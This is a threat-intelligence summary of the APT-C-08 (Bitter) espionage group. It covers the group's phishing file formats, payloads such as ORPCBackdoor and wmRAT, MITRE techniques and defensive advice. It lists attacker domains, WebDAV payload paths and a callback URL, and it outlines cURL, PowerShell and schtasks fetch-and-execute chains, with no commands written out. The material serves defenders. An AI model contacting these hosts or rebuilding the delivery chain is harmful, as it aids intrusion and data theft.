Threat Research

APT-C-08(蔓灵花)组织:揭示多元攻击载体的真相

Securonix

APT-C-08 (aka Bitter) is an APT group linked to a South Asian government that targets regional governments, foreign institutions, universities, and military industry to steal sensitive information. Over the past year they expanded and refined delivery methods—using malicious PDFs, PUB, CHM, LNK, searchConnector-ms, MSI and WebDAV-hosted payloads while employing scheduled tasks and multiple C2 domains to maintain access. #APT-C-08 #ORPCBackdoor

Keypoints

  • APT-C-08 focuses on espionage against government, academic, and military targets in and around South Asia.
  • Attackers use a wide variety of malicious document types (PDF, PUB, CHM, LNK, searchConnector-ms, PPT) as initial vectors.
  • Delivery often involves remote-hosted files (WebDAV/HTTP) and downloader scripts (VBS, PowerShell, cURL) that fetch payloads.
  • Payloads observed include wmRAT, C# backdoors, ORPCBackdoor, and several RAT families delivered via MSI or compressed archives.
  • Persistence is commonly achieved with scheduled tasks (schtasks) and abuse of Windows shortcuts and connector formats.
  • Multiple C2 domains and custom HTTP behaviors (e.g., specific headers/responses) are used to blend and maintain communications.

MITRE Techniques

  • [T1566] Phishing – Uses spear-phishing emails with malicious attachments to compromise users. (‘Uses spear-phishing emails with malicious attachments to compromise users.’)
  • [T1071] Command and Control – Utilizes multiple command-and-control domains and HTTP-based callbacks to communicate with compromised hosts. (‘Utilizes multiple command and control domains to maintain communication with compromised systems.’)
  • [T1203] Exploitation for Client Execution – Exploits document and application vulnerabilities to execute malicious code from crafted files. (‘Exploits vulnerabilities in software to execute malicious code through documents.’)
  • [T1053] Scheduled Task – Creates scheduled tasks to run downloaders or payloads regularly and maintain persistence. (‘Creates scheduled tasks to maintain access to compromised systems.’)
  • [T1041] Exfiltration Over C2 Channel – Collects and sends sensitive information back to attacker-controlled servers over established C2 channels. (‘Collects and sends sensitive information back to the attacker.’)

Indicators of Compromise

  • [Domain] Hosting/downloader URLs – adamsresearchshare.com, littlehipsononline.com, and other downloader domains (e.g., healthtipsart.com) referenced as WebDAV/HTTP hosts.
  • [File name] Downloaded or dropped files – Meeting Notice.rar, winegt.vbs, tmp.jpg (used as staged downloader), and other payload names.
  • [MSI/PE] Installer and executable samples – Leov2.2_client (MSI/PDB references), Miyav1.1_client_msi, and other RAT/MSI payloads.
  • [SearchConnector/WebDAV paths] Remote connector and DLL locations – http://healthtipsart.com/dll/Downloads/, and similar WebDAV paths used to host payloads.
  • [Command snippets] Malicious command patterns – examples using cURL, msiexec, schtasks and powershell to fetch and execute payloads (commands shown in article), and additional domains like demolaservices.com and demolaservices.com/dxl.php.

Over the last year APT-C-08 (Bitter) has broadened its toolkit and delivery formats, moving beyond simple PDFs to include Microsoft Publisher (PUB), CHM, LNK, searchConnector-ms, PPT, and MSI-based installers. Campaigns commonly deliver tiny downloader stubs or scripted shortcuts that use cURL, PowerShell, or VBS to pull binaries from WebDAV/HTTP hosts; those binaries range from lightweight RATs (wmRAT, MiyaRat variants) to more complex backdoors such as ORPCBackdoor and C#-based implants.

The group favors operational patterns that improve stealth and persistence: scheduled tasks (schtasks) to run fetch-and-execute chains on a cadence, use of multiple C2 domains with specific HTTP responses to avoid detection, and packaging payloads inside installers or archives to bypass simple file-type filters. Observed indicators include several malicious domains and downloader paths, repeating URL templates with user/computer name insertion, and recurring command-line templates that both retrieve and launch payloads.

Defenders should prioritize user awareness for spear-phishing, block known malicious hosting domains and WebDAV paths, monitor for suspicious scheduled tasks and unusual use of msiexec/curl/powershell, and inspect shortcut/search-connector files as potential initial access points. Rapid detection of the download/execution stage and containment of C2-related network traffic will reduce the chance of sensitive data exfiltration by the group’s backdoors.

Read more: https://mp.weixin.qq.com/s/pvm0QUAMS0U5dIge1ImcCQ